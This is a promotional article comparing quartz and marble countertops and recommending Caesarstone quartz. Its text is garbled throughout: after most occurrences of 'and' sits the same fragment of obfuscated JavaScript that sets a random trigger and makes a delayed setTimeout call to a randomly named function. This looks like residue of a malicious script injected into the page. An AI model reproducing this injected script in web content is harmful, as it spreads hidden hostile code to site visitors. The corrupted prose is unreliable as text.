Quartz countertops andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} marble countertops are as different as can be. Each have their own set of advantages andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} disadvantages. In the end, it all comes down to preference. If you’re seeking the perfect fit for your household, picture it with this Visualizer Tool from Caesarstone.

The Pros & Cons of Marble

If you want the classic look, marble is the way to go. Unfortunately, it scratches easily andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} is not stain resistant. On the other handandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}, its features include:

Heat-resistant. It will withstandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} your hot pots andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} pans. You won’t have to worry about the surface losing its lovely texture.
One of a Kind. Since no two slabs are perfectly alike, you’ll always have a unique piece for your home.

The Advantage of Quartz

As of late, quartz surfaces have risen in popularity. They come with a rich, luxurious finish, andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} they boast a more diverse range of colors than any other material. The following are just a few more of their luxurious qualities:

  • GREENGUARD Approved. Quartz countertops achieve GREENGUARD certification helps ensure buyers that they have purchased countertops with no VOC composition.
  • Heavy-duty Durability. It’s as tough as granite or concrete, but it won’t crack or chip half as easily. Most quartz counters are made with 93% quartz andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} the remaining 7% is composed of polymer ingredients that keep the counters intact.
  • Non-porous. If you want a surface that’s easy to clean, this is it. Not only is there no place for bacteria andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} viruses to hide but it’s resistant to stains.

Get Quartz Before You Think of Marble

Both materials have their respective looks andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} strengths. However, only one has both beauty andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} brawn. If you’re searching for a contemporary design with high durability andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} low maintenance, the choice is clear.

Caesarstone offers over a dozen options in quartz countertops. For more information on our collections, contact our experts andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} we will help you find the great quality counters that complement your home.